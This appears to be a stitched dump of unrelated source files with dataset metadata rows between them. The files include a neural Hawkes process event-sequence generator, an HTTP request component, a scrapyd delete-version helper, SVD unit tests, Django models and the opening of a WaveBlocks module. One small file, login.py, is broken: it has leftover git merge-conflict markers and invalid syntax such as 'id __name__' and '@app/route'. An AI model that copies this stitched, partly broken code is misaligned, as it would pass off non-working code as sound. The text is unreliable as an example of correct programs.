with open(file_save, 'wb') as f:
pickle.dump(model_dict, f)
#
def restart_sequence(self):
# clear the events memory and reset starting time is 0
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
#
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
#
#
#
#
def float32_to_bit(self, float_input):
'''
input a number in float, convert it to float32
get its 32-bit representations
'''
float32_input = numpy.float32(float_input)
str_input = ''.join(bin(ord(c)).replace('0b', '').rjust(8, '0') for c in struct.pack('!f', float32_input))
bit_input = numpy.zeros(
(self.dim_float,), dtype=dtype
)
assert(self.dim_float == len(str_input))
for idx, item_in_input in enumerate(str_input):
bit_input[idx] = numpy.float32(item_in_input)
return numpy.copy(bit_input)
#
#
def sigmoid(self, x):
return 1 / (1+numpy.exp(-x))
#
#
def compute_hidden_states(self):
# every time it is called,
# it computes the new hidden states of the LSTM
# it gets the last event in the sequence
# which is generated at t_(rec(t))
# and compute its hidden states
emb_event_t = self.Emb_event[
self.one_seq[-1]['type_event'], :
]
#
time_rep_t = self.hard_relu(
self.one_seq[-1]['time_since_last_event'] - self.Threshold_time
)
time_rep_t = numpy.concatenate(
(
time_rep_t,
self.one_seq[-1][
'time_since_last_event'
][None]
), axis = 0
)
emb_time_t = numpy.dot(
time_rep_t, self.Emb_time
)
#
post_transform = numpy.dot(
numpy.concatenate(
(emb_event_t, emb_time_t, self.hidden_t),
axis = 0
),
self.W_recur
) + self.b_recur
#
gate_input = self.sigmoid(
post_transform[:self.dim_model]
)
gate_forget = self.sigmoid(
post_transform[self.dim_model:2*self.dim_model]
)
gate_output = self.sigmoid(
post_transform[2*self.dim_model:3*self.dim_model]
)
gate_pre_c = numpy.tanh(
post_transform[3*self.dim_model:]
)
#
cell_t_new = gate_forget * self.cell_t + gate_input * gate_pre_c
hidden_t_new = gate_output * numpy.tanh(cell_t_new)
self.hidden_t = numpy.copy(hidden_t_new)
self.cell_t = numpy.copy(cell_t_new)
#
#
#
def compute_intensity_given_past(self, time_current):
# compute the intensity of current time
# given the past events
#
time_recent = self.one_seq[-1]['time_since_start']
#
delta = self.soft_relu(
numpy.tensordot(
self.hidden_t, self.W_delta, (0, 0)
)
)
#
hidden_with_time = numpy.exp(
-delta * (
time_current - time_recent
)
) * self.hidden_t[:, None]
# (self.dim_model, self.dim_process)
# self.W_alpha (self.dim_model, self.dim_process)
self.intensity_tilde = numpy.sum(
self.W_alpha * hidden_with_time,
axis = 0
) + numpy.dot(
self.hidden_t, self.W_mu
)
#
self.intensity = self.soft_relu_scale(
self.intensity_tilde
)
# intensity computation is finished
#
def compute_intensity_upper_bound(self, time_current):
# compute the upper bound of intensity
# at the current time
time_recent = self.one_seq[-1]['time_since_start']
#
delta = self.soft_relu(
numpy.tensordot(
self.hidden_t, self.W_delta, (0, 0)
)
)
#
hidden_with_time = numpy.exp(
-delta * (
time_current - time_recent
)
) * self.hidden_t[:, None]
# (self.dim_model, self.dim_process)
# self.W_alpha (self.dim_model, self.dim_process)
self.intensity_tilde_ub = numpy.sum(
self.hard_relu(
self.W_alpha * hidden_with_time
),
axis = 0
) + numpy.dot(
self.hidden_t, self.W_mu
)
# this part is time-invariant so
# we do not need to take its hard_relu
#self.hard_relu(
# numpy.dot(
# self.hidden_t, self.W_mu
# )
#)
#
self.intensity_ub = self.soft_relu_scale(
self.intensity_tilde_ub
)
# intensity computation is finished
#
#
def sample_time_given_type(self, type_event):
# type_event is the type of event for which we want to sample the time
# it is the little k in our model formulation in paper
time_current = numpy.float32(0.0)
if len(self.one_seq) > 0:
time_current = self.one_seq[-1]['time_since_start']
#
#self.compute_intensity(time_current)
self.compute_intensity_upper_bound(time_current)
intensity_hazard = numpy.copy(
self.intensity_ub[type_event]
)
#
u = 1.5
while u >= 1.0:
#print("type is : ", type_event)
E = numpy.random.exponential(
scale=1.0, size=None
)
U = numpy.random.uniform(
low=0.0, high=1.0, size=None
)
#print("E U time_current : ")
#print(E, U, time_current)
#print("intensity hazard is : ")
#print(intensity_hazard)
time_current += (E / intensity_hazard)
self.compute_intensity_given_past(time_current)
u = U * intensity_hazard / self.intensity[type_event]
#print("new time_current and u : ")
#print(time_current, u)
#print("intensity and upper bound is : ")
#print(self.intensity)
#print(self.intensity_ub)
# use adaptive thinning algorithm
# that is, decreasing the upper bound
# to make the sampling quicker
# use adaptive method by
# toggling on the following block
'''
self.compute_intensity_upper_bound(
time_current
)
intensity_hazard = numpy.copy(
self.intensity_ub[type_event]
)
'''
return time_current
#
#
#
def gen_one_seq(self, max_len):
self.restart_sequence()
'''
Liiniger (2009), p. 28, describes a "thinning algorithm":
generate one event of each type, take the minimum,
and discard the others.
Details found in my paper write-up
max_len is a pre-sampled value to set the length of seq
'''
# initialize the seq
time_since_start = numpy.float32(0.0)
time_since_start_each_event = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
for idx_event in range(max_len):
time_of_happen = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
# compute the hidden states
# of the most recent event in sequence
self.compute_hidden_states()
#
for type_event in range(self.dim_process):
# sample one event using "thinning algorithm"
time_of_happen[type_event] = numpy.copy(
self.sample_time_given_type(
type_event
)
)
#
time_since_start_new = numpy.min(time_of_happen)
type_event_new = numpy.argmin(time_of_happen)
self.cnt_total_event += 1
#
# update sequence
time_since_last_event = time_since_start_new - time_since_start
time_since_start = time_since_start_new
time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
time_since_start_each_event[type_event_new] = time_since_start
self.one_seq.append(
{
'idx_event': self.cnt_total_event,
'type_event': type_event_new,
'time_since_start': time_since_start,
'time_since_last_event': time_since_last_event,
'time_since_last_same_event': time_since_last_same_event
}
)
#
# throw away the BOS item
# at the head of the sequence
self.one_seq.pop(0)
#
#
#
def gen_seqs(self, settings):
#
#print(settings)
print("generating sequences ... ")
num_seqs = settings['num_seqs']
#
self.list_seqs = []
cnt_seqs = 0
#for idx_seq in range(num_seqs):
while cnt_seqs < num_seqs:
#
max_len = numpy.int32(
round(
numpy.random.uniform(
low=settings['min_len'],
high=settings['max_len']
)
)
)
#
self.gen_one_seq(max_len)
self.list_seqs.append(self.one_seq)
cnt_seqs += 1
if cnt_seqs % 10 == 9:
print("idx seq of gen : ", (cnt_seqs, self.name))
print("total number of seqs : ", num_seqs)
#
#
def print_some(self):
print("printing some seqs ... ")
for idx_seq in range(10):
print("the id of this seq is : ", idx_seq)
seq = self.list_seqs[idx_seq]
list_events = []
list_time = []
list_dtime = []
list_items = []
for event_item in seq:
list_events.append(event_item['type_event'])
list_time.append(
round(event_item['time_since_start'], 4)
)
list_dtime.append(
round(event_item['time_since_last_event'], 4)
)
list_items.append(
(
event_item['type_event'],
round(
event_item['time_since_last_event'], 4
)
)
)
print("the events, time and diff time for : ", idx_seq)
print(list_events)
print(list_time)
print(list_dtime)
print("the list of items is : ")
print(list_items)
#
#
def save_seqs(self, file_save):
with open(file_save, 'wb') as f:
pickle.dump(self.list_seqs, f)
class NeuralHawkesAdaptiveBaseGen_time_scale_reduce(
object
):
'''
here is the sequence generator
using Neural Hawkes process with reduced decay param
'''
def __init__(self, settings):
#
print("initializing generator ... ")
self.args = settings['args']
self.dim_float = numpy.int32(32)
if settings['path_pre_train'] == None:
print("random parameters ... ")
self.dim_process = settings['dim_process']
self.dim_model = settings['dim_LSTM']
self.dim_time = self.dim_float
#
numpy.random.seed(
settings['seed_random']
)
#
#self.scale = numpy.float32(
# numpy.random.uniform(
# low = 1e-3, high = 2.0,
# size = (self.dim_process, )
# )
#)
self.scale = numpy.float32(
numpy.ones( (self.dim_process, ) )
)
#
self.W_mu = numpy.float32(
numpy.random.uniform(
low = -1.0, high = 1.0,
size = (
self.dim_model, self.dim_process
)
)
)
#
self.W_delta = numpy.float32(
numpy.random.uniform(
low = -1.0, high = 1.0,
size=(
self.dim_model,
self.dim_model
)
)
)
#
self.W_alpha = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (self.dim_model, self.dim_process)
)
)
self.Emb_event = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_process + numpy.int32(1),
self.dim_model
)
)
)
self.Emb_time = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_time+numpy.int32(1),
self.dim_model
)
)
)
self.Threshold_time = numpy.float32(
numpy.random.uniform(
low = 0.0, high = 1.0,
size = (self.dim_time, )
)
)
self.W_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
3 * self.dim_model,
4 * self.dim_model
)
)
)
self.b_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (4*self.dim_model, )
)
)
else:
print("read pretrained model ... ")
path_pre_train = os.path.abspath(
settings['path_pre_train']
)
with open(path_pre_train, 'rb') as f:
model_pre_train = pickle.load(f)
self.dim_process = model_pre_train['dim_process']
self.dim_model = model_pre_train['dim_model']
self.dim_time = model_pre_train['dim_time']
#
self.scale = model_pre_train['scale']
self.W_mu = model_pre_train['W_mu']
self.W_delta = model_pre_train['W_delta']
self.W_alpha = model_pre_train['W_alpha']
self.Emb_event = model_pre_train['Emb_event']
self.Emb_time = model_pre_train['Emb_time']
self.Threshold_time = model_pre_train['Threshold_time']
self.W_recur = model_pre_train['W_recur']
self.b_recur = model_pre_train['b_recur']
#
#
#self.intensity = numpy.copy(self.mu)
self.name = 'AdaptiveNeuralHawkesGen_time_scale_reduce'
#
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
# initialization for LSTM states
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq) )
print("initialization done ")
#
#
def soft_relu(self, x):
return numpy.log(numpy.float32(1.0)+numpy.exp(x))
#
def soft_relu_scale(self, x):
# last dim of x is dim_process
x /= self.scale
y = numpy.log(numpy.float32(1.0)+numpy.exp(x))
y *= self.scale
return y
#
def hard_relu(self, x):
return numpy.float32(0.5) * (x + numpy.abs(x) )
#
#
def save_model(self, file_save):
print("saving model of generator ... ")
model_dict = {
'scale': numpy.copy(self.scale),
'W_mu': numpy.copy(self.W_mu),
'W_delta': numpy.copy(self.W_delta),
'W_alpha': numpy.copy(self.W_alpha),
'Emb_event': numpy.copy(self.Emb_event),
'Emb_time': numpy.copy(self.Emb_time),
'Threshold_time': numpy.copy(self.Threshold_time),
'W_recur': numpy.copy(self.W_recur),
'b_recur': numpy.copy(self.b_recur),
'dim_process': self.dim_process,
'dim_model': self.dim_model,
'dim_time': self.dim_time,
'dim_float': self.dim_float,
'name': self.name,
'args': self.args
}
with open(file_save, 'wb') as f:
pickle.dump(model_dict, f)
#
def restart_sequence(self):
# clear the events memory and reset starting time is 0
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
#
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
#
#
#
#
def float32_to_bit(self, float_input):
'''
input a number in float, convert it to float32
get its 32-bit representations
'''
float32_input = numpy.float32(float_input)
str_input = ''.join(bin(ord(c)).replace('0b', '').rjust(8, '0') for c in struct.pack('!f', float32_input))
bit_input = numpy.zeros(
(self.dim_float,), dtype=dtype
)
assert(self.dim_float == len(str_input))
for idx, item_in_input in enumerate(str_input):
bit_input[idx] = numpy.float32(item_in_input)
return numpy.copy(bit_input)
#
#
def sigmoid(self, x):
return 1 / (1+numpy.exp(-x))
#
#
def compute_hidden_states(self):
# every time it is called,
# it computes the new hidden states of the LSTM
# it gets the last event in the sequence
# which is generated at t_(rec(t))
# and compute its hidden states
emb_event_t = self.Emb_event[
self.one_seq[-1]['type_event'], :
]
#
time_rep_t = self.hard_relu(
self.one_seq[-1]['time_since_last_event'] - self.Threshold_time
)
time_rep_t = numpy.concatenate(
(
time_rep_t,
self.one_seq[-1][
'time_since_last_event'
][None]
), axis = 0
)
emb_time_t = numpy.dot(
time_rep_t, self.Emb_time
)
#
post_transform = numpy.dot(
numpy.concatenate(
(emb_event_t, emb_time_t, self.hidden_t),
axis = 0
),
self.W_recur
) + self.b_recur
#
gate_input = self.sigmoid(
post_transform[:self.dim_model]
)
gate_forget = self.sigmoid(
post_transform[self.dim_model:2*self.dim_model]
)
gate_output = self.sigmoid(
post_transform[2*self.dim_model:3*self.dim_model]
)
gate_pre_c = numpy.tanh(
post_transform[3*self.dim_model:]
)
#
cell_t_new = gate_forget * self.cell_t + gate_input * gate_pre_c
hidden_t_new = gate_output * numpy.tanh(cell_t_new)
self.hidden_t = numpy.copy(hidden_t_new)
self.cell_t = numpy.copy(cell_t_new)
#
#
#
def compute_intensity_given_past(self, time_current):
# compute the intensity of current time
# given the past events
time_recent = self.one_seq[-1]['time_since_start']
# W_delta : dim_model * dim_model
delta = self.soft_relu(
numpy.dot(
self.hidden_t, self.W_delta
)
)
# dim_model
hidden_with_time = numpy.exp(
-delta * (
time_current - time_recent
)
) * self.hidden_t
# dim_model
# self.W_alpha (self.dim_model, self.dim_process)
self.intensity_tilde = numpy.dot(
hidden_with_time, self.W_alpha
) + numpy.dot(
self.hidden_t, self.W_mu
)
#
self.intensity = self.soft_relu_scale(
self.intensity_tilde
)
# intensity computation is finished
#
#
def compute_intensity_upper_bound(self, time_current):
# compute the upper bound of intensity
# at the current time
time_recent = self.one_seq[-1]['time_since_start']
#
delta = self.soft_relu(
numpy.dot(
self.hidden_t, self.W_delta
)
)
#
hidden_with_time = numpy.exp(
-delta * (
time_current - time_recent
)
) * self.hidden_t
# hidden_with_time : dim_model
self.intensity_tilde_ub = numpy.sum(
self.hard_relu(
self.W_alpha * hidden_with_time[:, None]
),
axis = 0
) + numpy.dot(
self.hidden_t, self.W_mu
)
# this part is time-invariant so
# we do not need to take its hard_relu
#self.hard_relu(
# numpy.dot(
# self.hidden_t, self.W_mu
# )
#)
#
self.intensity_ub = self.soft_relu_scale(
self.intensity_tilde_ub
)
# intensity computation is finished
#
#
def sample_time_given_type(self, type_event):
# type_event is the type of event for which we want to sample the time
# it is the little k in our model formulation in paper
time_current = numpy.float32(0.0)
if len(self.one_seq) > 0:
time_current = self.one_seq[-1]['time_since_start']
#
#self.compute_intensity(time_current)
self.compute_intensity_upper_bound(time_current)
intensity_hazard = numpy.copy(
self.intensity_ub[type_event]
)
#
u = 1.5
while u >= 1.0:
#print("type is : ", type_event)
E = numpy.random.exponential(
scale=1.0, size=None
)
U = numpy.random.uniform(
low=0.0, high=1.0, size=None
)
#print("E U time_current : ")
#print(E, U, time_current)
#print("intensity hazard is : ")
#print(intensity_hazard)
time_current += (E / intensity_hazard)
self.compute_intensity_given_past(time_current)
u = U * intensity_hazard / self.intensity[type_event]
#print("new time_current and u : ")
#print(time_current, u)
#print("intensity and upper bound is : ")
#print(self.intensity)
#print(self.intensity_ub)
# use adaptive thinning algorithm
# that is, decreasing the upper bound
# to make the sampling quicker
# use adaptive method by
# toggling on the following block
'''
self.compute_intensity_upper_bound(
time_current
)
intensity_hazard = numpy.copy(
self.intensity_ub[type_event]
)
'''
return time_current
#
#
#
def gen_one_seq(self, max_len):
self.restart_sequence()
'''
Liiniger (2009), p. 28, describes a "thinning algorithm":
generate one event of each type, take the minimum,
and discard the others.
Details found in my paper write-up
max_len is a pre-sampled value to set the length of seq
'''
# initialize the seq
time_since_start = numpy.float32(0.0)
time_since_start_each_event = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
for idx_event in range(max_len):
time_of_happen = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
# compute the hidden states
# of the most recent event in sequence
self.compute_hidden_states()
#
for type_event in range(self.dim_process):
# sample one event using "thinning algorithm"
time_of_happen[type_event] = numpy.copy(
self.sample_time_given_type(
type_event
)
)
#
time_since_start_new = numpy.min(time_of_happen)
type_event_new = numpy.argmin(time_of_happen)
self.cnt_total_event += 1
#
# update sequence
time_since_last_event = time_since_start_new - time_since_start
time_since_start = time_since_start_new
time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
time_since_start_each_event[type_event_new] = time_since_start
self.one_seq.append(
{
'idx_event': self.cnt_total_event,
'type_event': type_event_new,
'time_since_start': time_since_start,
'time_since_last_event': time_since_last_event,
'time_since_last_same_event': time_since_last_same_event
}
)
#
# throw away the BOS item
# at the head of the sequence
self.one_seq.pop(0)
#
#
#
def gen_seqs(self, settings):
#
#print(settings)
print("generating sequences ... ")
num_seqs = settings['num_seqs']
#
self.list_seqs = []
cnt_seqs = 0
#for idx_seq in range(num_seqs):
while cnt_seqs < num_seqs:
#
max_len = numpy.int32(
round(
numpy.random.uniform(
low=settings['min_len'],
high=settings['max_len']
)
)
)
#
self.gen_one_seq(max_len)
self.list_seqs.append(self.one_seq)
cnt_seqs += 1
if cnt_seqs % 10 == 9:
print("idx seq of gen : ", (cnt_seqs, self.name))
print("total number of seqs : ", num_seqs)
#
#
def print_some(self):
print("printing some seqs ... ")
for idx_seq in range(10):
print("the id of this seq is : ", idx_seq)
seq = self.list_seqs[idx_seq]
list_events = []
list_time = []
list_dtime = []
list_items = []
for event_item in seq:
list_events.append(event_item['type_event'])
list_time.append(
round(event_item['time_since_start'], 4)
)
list_dtime.append(
round(event_item['time_since_last_event'], 4)
)
list_items.append(
(
event_item['type_event'],
round(
event_item['time_since_last_event'], 4
)
)
)
print("the events, time and diff time for : ", idx_seq)
print(list_events)
print(list_time)
print(list_dtime)
print("the list of items is : ")
print(list_items)
#
#
def save_seqs(self, file_save):
with open(file_save, 'wb') as f:
pickle.dump(self.list_seqs, f)
#
#
| 33.405162 | 114 | 0.510137 | 140,266 | 0.994301 | 0 | 0 | 0 | 0 | 0 | 0 | 29,577 | 0.209662 |
44503eada61c7c6d19634eb06fc44feea60e5c94 | 2,445 | py | Python | SeeThru_Feeds/Library/Components/HTTP.py | SeeThru-Networks/Python-Feed | 9c29fcf3462475e339f95d3e9766ed3a652ee6c0 | [
"MIT"
] | 3 | 2020-04-15T19:58:37.000Z | 2020-06-24T14:08:48.000Z | SeeThru_Feeds/Library/Components/HTTP.py | SeeThru-Networks/Python-Feed | 9c29fcf3462475e339f95d3e9766ed3a652ee6c0 | [
"MIT"
] | null | null | null | SeeThru_Feeds/Library/Components/HTTP.py | SeeThru-Networks/Python-Feed | 9c29fcf3462475e339f95d3e9766ed3a652ee6c0 | [
"MIT"
] | null | null | null | from SeeThru_Feeds.Model.Components.ComponentBase import ComponentBase
from SeeThru_Feeds.Model.Properties.Properties import FillableProperty, ResultProperty
import requests
class HTTPBase(ComponentBase):
URL = FillableProperty(name="url", required=True)
COOKIES = FillableProperty(name="cookies", required=False)
HEADERS = FillableProperty(name="header", required=False, default=None, of_type=dict)
RESPONSE = ResultProperty(name="response")
STATUS_CODE = ResultProperty(name="status_code")
RESPONSE_CONTENT = ResultProperty(name="response_content")
RESPONSE_URL = ResultProperty(name="response_url")
Component_Title = "HTTP Component"
Component_Description = "This component provides a wrapper over the requests http methods to make them follow the component design rules"
Component_Author = "SeeThru Networks"
Component_Owner = "SeeThru Networks"
class HTTPGet(HTTPBase):
def component_execute(self):
response = requests.get(self.get_property(
HTTPBase.URL), cookies=self.get_property(HTTPBase.COOKIES), headers=self.get_property(HTTPBase.HEADERS))
self.set_property(HTTPGet.RESPONSE, response)
self.set_property(HTTPGet.STATUS_CODE, response.status_code)
self.set_property(HTTPGet.COOKIES, response.cookies)
self.set_property(HTTPGet.RESPONSE_CONTENT, response.text)
self.set_property(HTTPGet.RESPONSE_URL, response.url)
class HTTPPost(HTTPBase):
DATA = FillableProperty(name="data")
JSON = FillableProperty(name="json", of_type=dict, required=False)
CONTENT_TYPE = FillableProperty(
name="content_type", default="application/x-www-form-urlencoded")
def component_execute(self):
if self.get_property(HTTPBase.HEADERS) is None:
self.set_property(HTTPBase.HEADERS, {'Content-Type': self.get_property(self.CONTENT_TYPE)})
response = requests.post(
self.get_property(HTTPPost.URL),
cookies=self.get_property(HTTPPost.COOKIES),
data=self.get_property(HTTPPost.DATA),
json=self.get_property(HTTPPost.JSON),
headers=self.get_property(HTTPBase.HEADERS)
)
self.set_property(HTTPPost.RESPONSE, response)
self.set_property(HTTPPost.STATUS_CODE, response.status_code)
self.set_property(HTTPPost.RESPONSE_CONTENT, response.text)
self.set_property(HTTPPost.RESPONSE_URL, response.url)
| 45.277778 | 141 | 0.737423 | 2,262 | 0.925153 | 0 | 0 | 0 | 0 | 0 | 0 | 317 | 0.129652 |
445366866803a78fbcbc59c0c86e7e7c1ab75d5c | 425 | py | Python | scrapyd_dash/operations/versions_delete.py | Dainius-P/scrapyd-dash | f769551070c919ba41616928309460a93e1b120a | [
"MIT"
] | 3 | 2019-08-20T12:33:06.000Z | 2019-12-28T17:05:30.000Z | scrapyd_dash/operations/versions_delete.py | Dainius-P/scrapyd-dash | f769551070c919ba41616928309460a93e1b120a | [
"MIT"
] | 6 | 2020-06-05T22:31:56.000Z | 2022-02-10T12:33:45.000Z | scrapyd_dash/operations/versions_delete.py | Dainius-P/scrapyd-dash | f769551070c919ba41616928309460a93e1b120a | [
"MIT"
] | 1 | 2020-12-10T07:02:06.000Z | 2020-12-10T07:02:06.000Z | import requests
"""
Delete a project version.
If there are no more versions available for a given project, that project will be deleted too.
"""
def delete_version(server, project, version):
url = "http://{}/delversion.json".format(server)
data = {
"project": project,
"version": version
}
with requests.Session() as session:
try:
r = session.post(url, data=data)
except:
return None
return r.json()
| 19.318182 | 94 | 0.691765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 174 | 0.409412 |
4453e7148b48df800b321d8e53272108159d1a65 | 346 | py | Python | login.py | kepler0301/test_git | 22b42b627b26224fff0bef29e43937b6a08c968a | [
"MIT"
] | 1 | 2018-12-27T12:58:46.000Z | 2018-12-27T12:58:46.000Z | login.py | kepler0301/test_git | 22b42b627b26224fff0bef29e43937b6a08c968a | [
"MIT"
] | null | null | null | login.py | kepler0301/test_git | 22b42b627b26224fff0bef29e43937b6a08c968a | [
"MIT"
] | null | null | null | print('helo world')
<<<<<<< HEAD
from flask import Flask
app = Flask(__name__)
def index():
return 'hello world'
id __name__ == '__main__'
app.run()
=======
from flask import Flask
app = Flask(__name__)
@app/route('/')
def index():
return 'hello world'
>>>>>>> b644c89d3eb5e1fcd31fedf63470ab57d597d9dd
print('bey')
num1 = 40
| 13.307692 | 48 | 0.647399 | 0 | 0 | 0 | 0 | 53 | 0.153179 | 0 | 0 | 56 | 0.16185 |
4453ea47443b6a656e1a8c29bb3c6e06d0db3779 | 2,922 | py | Python | tests/test_svd.py | owenl131/pylinlin | 07bb226cf5506b9e0633a35e5b4ce336ab0e5ba3 | [
"MIT"
] | null | null | null | tests/test_svd.py | owenl131/pylinlin | 07bb226cf5506b9e0633a35e5b4ce336ab0e5ba3 | [
"MIT"
] | 10 | 2020-11-12T14:46:45.000Z | 2020-11-13T05:30:36.000Z | tests/test_svd.py | owenl131/pylinlin | 07bb226cf5506b9e0633a35e5b4ce336ab0e5ba3 | [
"MIT"
] | null | null | null | import pytest
from pylinlin.matrix import Matrix
from pylinlin.matrix_view import MatrixView
import pylinlin.matrix_utils as utils
from pylinlin.svd import \
compute_svd, \
reduce_to_bidiagonal, \
compute_svd_bidiagonal
class TestSVD:
def test_reduce_to_bidiagonal(self):
mat = Matrix.from_cols([[1, 2, 3], [4, 5, 6], [7, 8, 10]])
b, _, _ = reduce_to_bidiagonal(mat)
utils.assert_upper_triangular(b)
truncated = MatrixView.with_size(
b, (0, 1), (mat.num_rows() - 1, mat.num_cols() - 1)
).to_matrix()
utils.assert_lower_triangular(truncated)
def test_bidiagonal_recreate(self):
mat = Matrix.from_cols([[1, 2, 3], [4, 5, 6], [7, 8, 10]])
b, left, right = reduce_to_bidiagonal(mat)
for index, hh in list(enumerate(left))[::-1]:
b = hh.multiply_left(b, index)
for index, hh in list(enumerate(right))[::-1]:
b = hh.multiply_right(b, index + 1)
utils.assert_matrix_equal(mat, b)
def test_bidiagonal_recreate_2(self):
mat = Matrix.from_cols([[1, 2, 3], [2, 5, 1], [-1, 3, -2]])
b, left, right = reduce_to_bidiagonal(mat)
for index, hh in list(enumerate(left))[::-1]:
b = hh.multiply_left(b, index)
for index, hh in list(enumerate(right))[::-1]:
b = hh.multiply_right(b, index + 1)
utils.assert_matrix_equal(mat, b)
def check_svd(self, u, s, v, mat):
utils.assert_orthonormal(u)
utils.assert_orthonormal(v)
utils.assert_lower_triangular(s)
utils.assert_upper_triangular(s)
diagonal = utils.extract_diagonal(s)
for i in range(len(diagonal) - 1):
assert diagonal[i] >= diagonal[i+1]
for elem in diagonal:
assert elem >= 0
product = u.multiply(s).multiply(v.transpose())
product.print_full()
mat.print_full()
utils.assert_matrix_equal(product, mat)
def test_svd_bidiagonal(self):
mat = Matrix.from_cols([[1, 0, 0], [2, 3, 0], [0, 4, 5]])
u, s, v = compute_svd_bidiagonal(mat)
self.check_svd(u, s, v, mat)
def test_svd_bidiagonal_2(self):
mat = Matrix.from_cols(
[[3.742, 0, 0], [4.018, 3.511, 0], [0, -3.408, -1.979]])
u, s, v = compute_svd_bidiagonal(mat)
self.check_svd(u, s, v, mat)
def test_svd_square(self):
mat = Matrix.from_cols([[1, 2, 3], [2, 5, 1], [-1, 3, -2]])
u, s, v = compute_svd(mat)
self.check_svd(u, s, v, mat)
def test_svd_more_rows(self):
mat = Matrix.from_cols([[1, 2, 3, 1], [2, 5, 1, 0], [-1, 3, -2, -2]])
u, s, v = compute_svd(mat)
self.check_svd(u, s, v, mat)
def test_svd_more_cols(self):
mat = Matrix.from_cols([[1, 2, 3], [2, 5, 1], [-1, 3, -2], [3, 2, 1]])
u, s, v = compute_svd(mat)
self.check_svd(u, s, v, mat)
| 36.525 | 78 | 0.577687 | 2,687 | 0.919576 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
4457c61974adf6ea23263c3521814d88592f3989 | 198 | py | Python | translateSfw.py | tkarabela/translate-swf | 4756079294de9faa55d95b320d9b8a5ae6c40104 | [
"MIT"
] | 1 | 2022-03-15T21:44:50.000Z | 2022-03-15T21:44:50.000Z | translateSfw.py | tkarabela/translate-swf | 4756079294de9faa55d95b320d9b8a5ae6c40104 | [
"MIT"
] | null | null | null | translateSfw.py | tkarabela/translate-swf | 4756079294de9faa55d95b320d9b8a5ae6c40104 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import pyTranslateSwf
import sys
def main():
cli = pyTranslateSwf.PyTranslateSwfCLI()
return cli.run(sys.argv[1:])
if __name__ == '__main__':
sys.exit(main())
| 15.230769 | 44 | 0.681818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 32 | 0.161616 |
44588a8251975fab2aceaf05fcf35cad8b89e5fe | 656 | py | Python | GT/GT_app/models.py | 10K-Linesofcode/Glowing-Tribble | be0e17ce5391b589792e4ae6b02156d7ee4ce145 | [
"MIT"
] | null | null | null | GT/GT_app/models.py | 10K-Linesofcode/Glowing-Tribble | be0e17ce5391b589792e4ae6b02156d7ee4ce145 | [
"MIT"
] | null | null | null | GT/GT_app/models.py | 10K-Linesofcode/Glowing-Tribble | be0e17ce5391b589792e4ae6b02156d7ee4ce145 | [
"MIT"
] | null | null | null |
from __future__ import unicode_literals
from django.db import models
# Create your models here.
class Topic(models.Model):
top_name= models.CharField(max_length=264,unique=True)
def __str__(self):
return self.top_name
class Webpage(models.Model):
topic=models.ForeignKey(Topic,on_delete=models.DO_NOTHING)
name=models.CharField(max_length=264,unique=True)
url=models.URLField(unique=True)
def __str__(self):
return self.name
class AccessRecord(models.Model):
name=models.ForeignKey(Webpage,on_delete=models.DO_NOTHING)
date = models.DateField()
def __str__(self):
return str(self.date)
| 22.62069 | 63 | 0.731707 | 550 | 0.838415 | 0 | 0 | 0 | 0 | 0 | 0 | 26 | 0.039634 |
445cac484200f11a9ce597a53a164ef8e3583569 | 13,084 | py | Python | WaveBlocksND/IOManager.py | raoulbq/WaveBlocksND | 225b5dd9b1af1998bd40b5f6467ee959292b6a83 | [
"BSD-3-Clause"
] | 3 | 2016-09-01T21:13:54.000Z | 2020-03-23T15:45:32.000Z | WaveBlocksND/IOManager.py | raoulbq/WaveBlocksND | 225b5dd9b1af1998bd40b5f6467ee959292b6a83 | [
"BSD-3-Clause"
] | null | null | null | WaveBlocksND/IOManager.py | raoulbq/WaveBlocksND | 225b5dd9b1af1998bd40b5f6467ee959292b6a83 | [
"BSD-3-Clause"
] | 6 | 2016-03-16T15:22:01.000Z | 2021-03-13T14:06:54.000Z | """The WaveBlocks Project
This file contains code for serializing simulation data.
@author: R. Bourquin
